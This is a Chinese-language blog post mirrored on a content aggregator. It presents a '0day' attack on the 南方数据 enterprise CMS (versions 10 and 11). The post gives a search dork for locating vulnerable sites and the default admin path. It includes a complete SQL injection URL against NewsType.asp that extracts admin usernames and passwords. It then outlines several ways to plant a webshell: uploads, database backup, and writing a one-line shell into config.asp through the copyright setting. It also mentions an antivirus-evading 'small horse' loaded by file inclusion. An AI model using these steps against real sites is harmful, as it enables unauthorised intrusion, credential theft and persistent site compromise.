zoukankan      html  css  js  c++  java
  • 南方数据企业0day

    漏洞影响版本 v10.0 v11.0

    关键字:inurl:”HomeMarket.asp”

    默认后台:/admin

    直接爆用户密码:


    http://www.xxx.com/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='


    拿shell方法貌似有4种:
    1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
    2、进后台备份数据库
    3、在网站配置的版权信息里插入一句话,一句话地址写入到http://www.xxx.com/inc/config.asp
    3.1、另外一种插配置:
    第一步  网站配置添加TXT

    保存成功后
    第2步传一个TXT小马

    小马要免杀的
    第3步  网站配置 利用包含得到小马
    "%>

    具体参考:http://hi.baidu.com/hkok8/item/7df99d25975fda4047996225

  • 相关阅读:
    链表相加
    Unity 摄像机跟随
    整数反转
    两数和
    频繁项集挖掘思路
    有关于二进制的乘法计算(原码一位乘)
    JAVA面向对象(下)
    JAVAAPI
    JAVA面向对象()上)
    JAVA基础第一章
  • 原文地址:https://www.cnblogs.com/milantgh/p/3775448.html
Copyright © 2011-2022 走看看